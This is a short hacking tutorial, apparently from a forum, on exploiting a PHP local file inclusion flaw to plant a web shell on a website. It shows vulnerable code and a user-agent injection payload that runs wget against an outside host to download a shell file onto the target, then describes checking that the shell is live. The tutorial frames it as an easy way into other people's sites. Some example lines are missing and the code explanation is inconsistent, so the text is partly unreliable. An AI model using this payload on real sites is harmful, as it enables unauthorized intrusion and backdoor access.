3. PHP injection
Remember LFI? This is a tutorial on how to get the shell on the website with a site vulnerable to LFI.
Here is the example of a code that is vulnerable to LFI:
// LFI Vulnerable Code
$redirect = $_GET[redirect];
It is vulnerable because $redirect is not sanitized, therefor include($redirect); will read off $_GET[page];.
Here is a example of LFI on Unix (very old):
To check if it is vulnerable, we enter this in the ../ part:
If you get something like DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc... That means it is vulnerable.
If you get only a blank page, it isn't vulnerable.
3. PHP Injection
Now, let's access it and use Tamper Data to change the user agent to this:
<?system('wget http://gonullyourself.org/shell.txt -O gonullyourself.php');?>
Now, submit the request.
Our command will be executed.
4. Accessing the shell
To check if the command got executed, we will enter something like this:
If our shell is there, the command was successfully executed.
Easy :) Isn't it?